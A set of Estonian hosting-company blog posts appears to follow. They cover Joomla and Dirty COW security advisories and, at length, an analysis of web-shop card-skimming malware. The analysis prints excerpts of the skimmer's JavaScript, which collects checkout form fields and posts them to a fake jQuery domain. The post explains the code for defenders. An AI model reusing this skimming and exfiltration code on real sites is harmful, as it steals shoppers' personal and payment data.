E-kirjade suunamine serverite vahel võib olla üllatavalt keeruline. Seletame, kuidas seda viisakalt teha.

Zone.ee IT arhitekt Andris Reinman seletab lahti üllatavad kitsaskohad, mis võivad tekkida sellise lihtsa toimingu juures nagu e-kirjade suunamine ühest serverist teise. Milline on taust, mida suunamisel arvestada ja kuidas meie oma suunamisprobleemid lahendasime.

 

Hiljuti tekkis meil probleem e-kirjade ümbersuunamisega, kus klient on teinud endale ümbersuunamisaadressi, näiteks minu-pere@minudomeen.ee ja iga sellele aadressile saadetud kiri edastatakse siis kliendi poolt määratud sihtkoha aadressidele. Aga enne, kui vaadata mis probleem see täpselt oli ja mis oli lahenduseks, vaataksime kõigepealt üldse kirjade liikumise ja ümbersuunamise tausta.

Loe edasi “E-kirjade suunamine serverite vahel võib olla üllatavalt keeruline. Seletame, kuidas seda viisakalt teha.”

.EE tippdomeen taas muutuste tuules, kas ka ohtudele valla?

Eesti Interneti SA annab teada eesootavast 14% hinnalangusest, mis langetab .EE domeeni hinda 1 euro võrra. Vaatame kreeklaste kingitud hobusele suhu ja mõtleme, mis muutuv domeenireeglistik veel endaga kaasa toob.

ardi_640_2

Sügis ei too endaga kaasa ainult lehe- ja lumesadu. Juba mitmed aastad on see toonud ka teate Eesti tippdomeeni haldajalt, et domeenireeglistik on muutumas. Nii ka seekord.

Sel aastal tõid tuuled endaga kaasa mõned sellised muutusettepanekud, mis panid mind esmalt üllatusest kulme kergitama ja hiljem sõnakalt protesteerima. Tundub nimelt, et mõned soovitud muutustest ei teeni mitte laiapõhjalise internetikogukonna huve, vaid väga kitsalt tippdomeeni registri ning domeenidega äritsejate huve.

Loe edasi “.EE tippdomeen taas muutuste tuules, kas ka ohtudele valla?”

Veel üks tont: Joomla! 3.6.4 kriitiline turvauuendus versioonidele alates 3.4.4

Turvaprobleem lubab kurjategijal lisada saidile administraatori-õigustes kasutajaid.

TÄIENDATUD: 27. oktoobri seisuga on veebis olemas täpsed kirjeldused kasutaja registreerimiseks admin-õigustes (huvilised saavad registreerimise osa läbimängu jälgida ka taikeelse video vahendusel). Öösel hakkasid tulema ka esimesed neis kirjeldatud mustrile vastavad päringug. Run, Forrest, run!

Halloween on sedapuhku varajane ja aastaid koodis vedelenud tondid käivad hoogsalt rahvast hirmutamas.

Tänase kolli toob meieni Joomla! arendaja Demis Palma (loe lähemalt:How I found a Joomla vulnerability), kellele veidi aega tagasi hakkas silma koodijupp, mis oli kahtlaselt sarnane kahes erinevas kasutajatega tegelevas kontrolleris. Arvatavasti oli koodi korrastatud ja unustatud vana versioon eemaldada, sellele pääseb aga vähese vaevaga ligi ja tulemuseks on võimalus registreerida kasutajaid ka saidis, kus see on omaniku poolt keelatud.

Demis’e väitel pärineb kood Joomla! 1.6 aegadest – aga kuna ametlik hoiatus käib versioonidele alates 3.4.4, siis küllap ei õnnestu probleemi varasematel versioonidel ära kasutada.

Niisiis saab paikamata 3.4.4…3.6.3 Joomla! puhul triviaalse trikiga ligi “surnud koodile” ja uusi kasutajaid registreerida. Isegi väikeste õigustega registreeritud kasutaja on aga täiendav turvarisk, sest kohati õnnestub teiste bugide tõttu tavakasutaja administraarotiks [käsi ei tõuse seda näpukat parandama] ülendada või siis kasutada ära mõne lisamooduli turva-auku, mis ei kontrolli nt faili üleslaadimisel üldse õigust seda teha.

Sedapuhku avastas aga konto loomise augu lappimisega tegelenud Davide Tampellini lisaks teise: liigsete õiguste andmine mille lühike selgitus ütleb, et “vigane andmete filtreerimine lubab registreerida kõrgemata õigustega kasutaja”. Kuigi täpsem selgitus ei ole hetkel turvakaalutlustel saadaval, võib selle kokku võtta nii:

Kui sa ei ole oma Joomla! saiti uuendanud, siis arvesta, et ilmselt tekivad peagi esimesed reaalsed ründed mis lubavad kellel tahes ennast administraatorina registreerida.

Nagu Sucuri eile õhtul teatas vaatasid nad muudatuse koodi üle, selgitasid välja võimalikud ründevektorid ja lisasid asjakohased reeglid oma Sucuri Firewall teenusele.

Mida siis teha?

 • kui sul on Joomla! paigaldatud meie Zone+ abil ja kõik uuendused lubatud, siis peaks sait olema uuendatud 3.6.4 peale – aga kuna paigaldamise järel tehtud muudatused võivad vahel uuendamist takistada, siis proovi Minu Zones Zone+ lehel vastava rakenduse juures Uuenda nuppu ja kui see ei aita, kirjuta meile info@zone.ee

joomla-update

 • kui sul on Zone+ abil paigaldatud varasem versioon ja lubatud väikesed uuendused (st tehakse 3.5.1›3.5.2, aga mitte 3.5.x›3.6.x uuendust) – või oled valinud käsitsi uuendamise – siis tuleks kindlasti sait ülalmainitud viisil kiiremas korras Joomla! 3.6.4 peale uuendada ja soovitavalt lubada kõik uuendused, seda saab teha pildil näha oleva Automaatsed uuendused valiku alt:

automaatsed-uuendused

 • kui sul on ise paigaldatud Joomla! – siis tuleks administraatorina sisse logida (enne, kui neid saab palju olema…) ning teha versioonile vastaval moel uuendus, seejärel (või enne) võib ka kirjutada info@zone.ee ja paluda meil olemasolev rakendus Zone+ alla importida ning lubada kõik uuendused, sest siis on edaspidi vähem põhjust paanikaks 🙂

Kui vajad Joomla! osas nõu või tahad uudistega kursis olla, siis Eesti Joomla! kommuuni leiad Eraser’ist.

Joomla! uuendamine Zone+ abil

Kuigi on võimalik uuendada ka 3.4.8 peale siis juhin tähelepanu, et erinevalt nt WordPress’ist ei tule Joomla! varasematele versioonidele enam turvapaikasid ja uuendada tuleks kindlasti 3.6.4 peale.

Joomla! uuendamine rakenduse enda vahenditega

Kui välja arvata vajadus korduvalt sisse logida, siis sujub ka see igati “next-next-next” meetodil.

Räpased koduloomad serverites – Dirty COW

Lõbusa nime Dirty Cow taga peitub viimase aja üks ohtlikumaid Linux operatsioonisüsteemi turvanõrkuseid. Kui sinu haldusalas on Linux servereid, siis loe kindlasti mida kirjutab selle kohta Zone.ee infosüsteemide arhitekt.

cow-147576_1280Eelmisel nädalal parandati esialgu suurema kärata Linuxi kernelis mäluhalduse viga, mis on suutnud seal 9 aastat märkamatuks jääda. Peagi selgus, et asi on oluliselt tõsisem kui paranduse tekstist arvata võis – viga kasutatakse pahatahtlike häkkerite poolt juba aktiivselt ära ning tõenäoliselt on seda tehtud juba pikemat aega. Probleem on niivõrd tõsine, et sundis teenusepakkujaid üle maailma erakorralisi hooldustöid ette võtma ning on teada ka juhtumeid, kus halvima ära hoidmiseks teenustel paranduse paigaldamiseni sõna otseses mõttes juhe seinast tõmmati. Ka Zone tehnikutel olid nädala lõpus käed tööd täis. Ning nagu tõsiste turvaprobleemide puhul tänapäeval tavaline, sai probleem oma veebilehe, logo ja nime – Dirty COW.

Miks selline paanika? Lühidalt saavad süsteemi tavakasutajad leitud viga ära kasutades kirjutada mälupiirkondadesse, kuhu kirjutamise õigust neil olla ei tohiks, ning sellisel moel oma õigusi süsteemis suurendada. Koos vea avalikustamisega käivitus ka võistlus koodikirjutajate vahel – kes suudab välja tulla lihtsama ning töökindalama meetodiga, kuidas anda tavakasutajale root kasutaja õigused ja seega täielikku kontrolli kogu süsteemi üle? Tänaseks on Internetis vabalt saada mitmeid koodijuppe, mis teevad seda nii hästi, et nende kasutamine pole mingi probleem ka kõige kogenematule pahalasele. Kui alguses levis ka info, kuidas süsteemi uuendamata enda süsteeme kaitsta, siis praegu levivate ründeprogrammide vastu on need kasutud. Ainuke toimiv kaitse on kerneli uuendamine.

K: Kes/mis on mõjutatud?
V: Kõik Linuxi süsteemid, mis kasutavad kerneli versiooni 2.6.22 või uuemat. Kuna 2.6.22 ilmus aastal 2007, siis võib põhimõtteliselt vist öelda – pea kõik maailmas leiduvad Linuxid, mida pole viimase nädala jooksul tahtmatult või tahtlikult uuendatud. Alloloevast nimekirjast leiad populaarsemate Linuxi distributsioonide kernelite versioonid, kus viga juba parandatud. Kui sinu süsteemis on kerneli versiooninumber (seda saad vaadata käsuga „uname -rv“) väiksem kui tabelis, on süsteem haavatav.

 • Ubuntu 16.10 – 4.8.0-26.28
 • Ubuntu 16.04 LTS – 4.4.0-45.66
 • Ubuntu 14.04 LTS – 3.13.0-100.147
 • Ubuntu 12.04 LTS – 3.2.0-113.155
 • Debian 8 – 3.16.36-1+deb8u2
 • Debian 7 – 3.2.82-1
 • RedHat/Centos 7 – 3.10.0-327.36.3

K: Mida ma teha saan?
V: Aitab ainult kerneli uuendamine. Kui su hallata on süsteemid, mis veel uuendamata, tee seda niipea kui võimalik.

K: OK, aga mida ma Zone kliendina tegema pean?
V: Kui kasutad meie tarkvaraplatvormiga serveriteenust (nagu Virtuaalserver või Nutikas Privaatserver) või Pilverserver VPS-i, kannab uuendamise eest hoolt Zone. Küll aga pead sa ise muret tundma ja tegutsema, kui oled Privaatserveri või Pilveserver Pro SSD kasutaja.

K: Kui mu süsteemis shelli kasutajaid pole, pole probleemi?
V: Probleem on ikka, lihtsalt natuke keerulisem ära kasutada. Interneti pimedamates nurkades on juba levimas ka valmiskomplektid stiilis “WordPressi turvaveaga tavakasutajaks + räpase lehmaga root kasutajaks”. Kui su Linux on Internetiga ühendatud, on selle turvalisus ohus.

Viited

https://dirtycow.ninja/
https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html
https://security-tracker.debian.org/tracker/CVE-2016-5195
https://access.redhat.com/security/vulnerabilities/2706661

Tuntud veebipoode nakatanud pahavara luubi all

Vaatame ühe häkitud veebipoe näitel, kuidas pahavara klientide krediitkaardi andmeid varastab. Kas ja kui suur probleem see kohalike veebipoodide jaoks üldse on?

Ilmselt ei jäänud kellelgi märkamata eelmise nädala uudis pahavaraga nakatunud ja seetõttu krediitkaardi andmeid varastavate kohalike veebipoodide kohta. Probleem on reaalne, veebipoed olid tõepoolest nakatunud krediitkaardinumbreid varastava pahavaraga, samas võimalik kahju – vähemalt kohalike veebipoodide klientide jaoks – on tõenäoliselt väike või täiesti olematu.

Et aru saada, milles üldse küsimus, võtame näitena ühe tuntud veebipoe, mis nakatus selle aasta veebruari alguses ja oli seda kuni eelmise nädalani. Mõne turvaaugu kaudu (tõenäoliselt shoplift) oli lisatud veebipoe templiidifaili JavaScripti koodiblokk, mis tõmmati seeläbi käima igal lehevaatamisel. Vaatamegi nüüd, et mida see konkreetne kood siis selles veebipoes teha üritas.

Rakenduse skoop on asetatud objekti nimega grelos_v sisse:

var grelos_v = {
 snd: null,
 Glink: 'https://jquery-cloud.net/code/jquery.min.js',
 ...
}

Esimese asjana märkame kohe huvitavat viidet jQuery teegi pihta. Iseenesest sellest polekski midagi erilist, aga siinkohal on tegu pettusega. Nimelt oli jquery-cloud.net pahavara serveeriv veebiserver, mis tänaseks on juba suletud. Taoline nimetus on valitud ainult juhusliku vaataja eksitamiseks, reaalselt jQuery teegiga siin midagi pistmist ei ole. Sündmustest ette rutates võib mainida, et tegu oli veebiaadressiga, kuhu pahavara saatis kasutaja kohta kogutud informatsiooni.

myid: (function (name) {
 var matches = document.cookie.match(new RegExp('(?:^|; )' ...
 return matches ? decodeURIComponent(matches[1]) : undefined;
})('setidd') || (function () {
 ...
 var myid = ms.getTime() + "-" + ...
 document.cookie = 'setidd=' + myid + '; path=/; expires=' ...;
 return myid;
})()

Järgmiseks paneb skript paika omaduse myid, millele loetakse väärtus brauseri küpsistest, kus kasutatud küpsise võtmeks on mittemidagiütlev setidd. Juhul kui sellist küpsist ei leita, genereeritakse uus väärtus, mis koosneb hetke ajast ja juhuslikust numbrist. Seda väärtust on hiljem vaja erinevate kasutajate andmete eraldamiseks.

base64_encode: function (data) {
 var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu...
 ...
 return enc;
}

Siin ei olegi mõtet pikemat midagi arutada, nimi ütleb kõik. Funktsioon võtab sisendiks mingi väärtuse ja tagastab selle base64 kodeeringus.

clk: function () {
 var inp = document.querySelectorAll(
  "input, select, textarea, checkbox, button");
 for (var i = 0; i < inp.length; i++) {
  ...
   grelos_v.snd += inp[i].name + '=' + inp[i].value + '&';
}

See on juba huvitavam funktsioon. Nimelt otsitakse lehelt üles kõik vormielemendid ning nende väärtustest koostatakse serialiseeritud string, mis näeb natukene välja nagu www-form-urlencoded väärtus, kuigi rangelt võttes see seda siiski pole.

send: function () {
 ...
}

Nüüd jõuame rakenduse tuumani ehk funktsioonini send(). Kuna see on kõige olulisem rakenduse osa, siis vaatame selle sisu veidi lähemalt

var btn = document.querySelectorAll(
 "a[href*='javascript:void(0)'],button, input, submit, .btn, .button"
);

Funktsiooni käivitumisel otsitakse lehelt üles kõik vormielemendid, mis võiksid olla nupud. Selle jaoks kõlbavad nii <button> elemendid, elemendid CSS klassiga .btn kui ka tavalised lingid, mis kuhugi ei vii.

for (var i = 0; i < btn.length; i++) {
 var b = btn[i];
 if (b.type != 'text' && b.type != 'select' && ...
  if (b.addEventListener) {
   b.addEventListener('click', grelos_v.clk, false);
 ...

Kui nupu-laadsed elemendid on lehelt üles leitud, võetakse need ükshaaval tsükliga ette ning kontrollitakse ega tegu ei ole mõne tavalise vormielemendiga, näiteks <select> või checkbox vmt. Juhul kui ei ole, siis eeldab rakendus, et tegu ongi nupuga ja lisab sellele väidetavale nupuelemendile uue ‘click’ sündmuse, mis käivitab juba eespool nimetatud clk() meetodi.

var frm = document.querySelectorAll('form');
 for (vari = 0; i < frm.length; i++) {
  if (frm[i].addEventListener) {
   frm[i].addEventListener('submit', grelos_v.clk, false);
 ...

Siin toimub sisuliselt sama asi, ainult et nuppude asemel otsitakse lehelt kõik vormid ja lisatakse funktsiooni clk() rakendumine vormi sündmuse ‘submit’ jaoks, mis rakendub tol hetkel, kui brauser valmistub vormi andmeid veebipoe serverile saatma.

Seega siinkohal oleme sellises seisus, et kui lehel on mõni nupp ja kasutaja sellel klikib (rakendub ‘click’ või ‘submit’ sündmus), otsib funktsioon clk() lehelt üles kõik vormielemendid ja salvestab need muutujasse snd. Iseenesest on pahavara jaoks see juba üsna väärtuslik info, aga momendil on sellest veel vähe kasu, kuna see väärtus on endiselt kasutaja brauseri mälus. Vaatame aga, et mis edasi saab.

if (grelos_v.snd != null) {
 var domm = location.hostname.split('.').slice(0).join('_');
 var keym = grelos_v.base64_encode(grelos_v.snd);
 ...
 http.open('POST', grelos_v.Glink, true);
 ...
 http.send(
  'info=' + keym + '&hostname=' + domm + '&key=' + grelos_v.myid);
}

Siin toimubki siis andmete reaalne saatmine serverisse, kus pahavara keskusena on kasutusel eespool toodud võlts-jQuery link. Saadetavateks andmeteks on veebipoe domeeninimi, küpsisest võetud kasutaja ID ning base64 kodeeritult snd omadusse salvestatud vormiväljade andmed.

Ilmselgelt võiks sellise andmete edastamisega kiirelt vahele jääda, kuna nuppe on lehekülgedel palju. Liigse andmete saatmise välistab järgmine koodijupp, mis kogu kupatuse lõpuks käima tõmbab.

if (
 new RegExp('onepage|checkout|onestep', 'gi').test(window.location)
) {
 grelos_v.send();
}

Seega rakendub kogu loogika ainult nendel veebilehtele, mille veebiaadressi järgi võib arvata, et tegu on makse sooritamise lehega. Muudel lehtedel, näiteks niisama veebipoes ringi surfates, jääb pahavara kood rakendumata ja mingeid andmeid kuskile ei saadeta.

Niisiis, milles üldse probleem? Pahavara on ju üsna lihtsakoeline, mis teema nende krediitkaartidega siis on? Krediitkaartidega seob pahavara see, et traditsiooniliselt tuleb veebipoes tellimusvormi täitmisel sisestada ka oma krediitkaardi numbrid. Kui nüüd veebipoe klient on sellisel vormil andmed ära täitnud ja klikib nupul “Kinnita tellimus”, siis lisaks “päris”-kinnitusele ehk sisestatud andmete edastamisele veebipoe serverile, teeb brauser veel ühe päringu – pahavara poolt määratud veebiaadressile koos kõigi lehel olevate vormiväljade andmetega. Kui vormis olid toodud krediitkaardi numbrid, siis ongi pahalasel need väärtused nüüd kenasti käes.

Tagasi tulles kohalike veebipoodide juurde, miks ma julgen arvata, et rahalist kahju peaaegu et ei olnud või oli see väga väike. Nimelt on küsimus meie väljakujunenud online maksete süsteemis. Kuigi praeguseks suurem osa veebipoode juba võtab krediitkaardimakseid vastu (peamiselt domineerivad endiselt hoopis pangalingi protokollile ehitatud ülekanded), siis tehakse seda reeglina läbi kolmanda osapoole, olgu selleks siis Estcard (endine Pankade Kaardikeskus), Maksekeskus või kasvõi PayPal, kuna erinevalt näiteks USA veebipoodidest, ei ole meie kohalikel veebipoodidel reeglina õigust ise neid numbreid koguda. Kõik mainitud teenused suunavad kasutaja kaardinumbrite sisestamiseks veebipoe lehelt ära ja veebipood ning seega ka veebipoes paiknev pahavara neid numbreid kunagi ei näe.

Estcard ja PayPal suunavad kasutaja makse teostamiseks oma veebisaidile, Maksekeskus ning välismaised Recurly, Stripe jmt. jälle kuvavad veebipoe lehel maksevormi läbi oma <iframe> lehe, millele veebipood ise samuti ligi ei pääse. Kasutaja jaoks tundub selline <iframe> maksevorm olevat veebipoe osa, kuid tegelikkuses on see vaid illusoorne seos, veebipoe lehel käivituva JavaScripti jaoks on see täielik must kast, mille kohta on võimalik teada saada vaid selle elemendi mõõtmed, kuid mitte midagi selle elemendi sisu kohta.

Veebipood, milles asuvat pahavara koodi ma siinkohal vaatasin, kasutaski maksete kogumiseks Maksekeskuse teenust ja seega võis pahavara koguda kasutaja kohta küll mingeid andmeid, mis paraku võisid olla isegi üsna privaatsed (nimi, telefoninumber, aadress jne), kuid kasutaja krediitkaardi või muid makse andmeid see pahavara kunagi näha ei saanud.

See kõik aga ei tähenda, et kohalikud veebikaupmehed võiksid ennast mugavalt tunda ja turvalisusele mitte mõelda. Kaugel sellest. Esiteks on ka niisama privaatsete isikuandmete leke päris suur probleem (vaadeldud veebipood saatis üle poole aasta kõikide klientide andmed kes teab kuhu) ja teiseks, kui maksevormid suunduvad kolmanda osapoole serverisse, kuhu pahavaral ligipääs puudub, võib oodata tulevikus palju keerukamaid lahendusi, mis võltsivad sarnaselt tavalisele phishingule juba maksevormide vaateid ja korjavad need numbrid ikkagi kokku. Praegu kohalikel kaupmeestel veel vedas, aga seda vedamist ei pruugi väga pikalt jätkuda.

Samal teemal: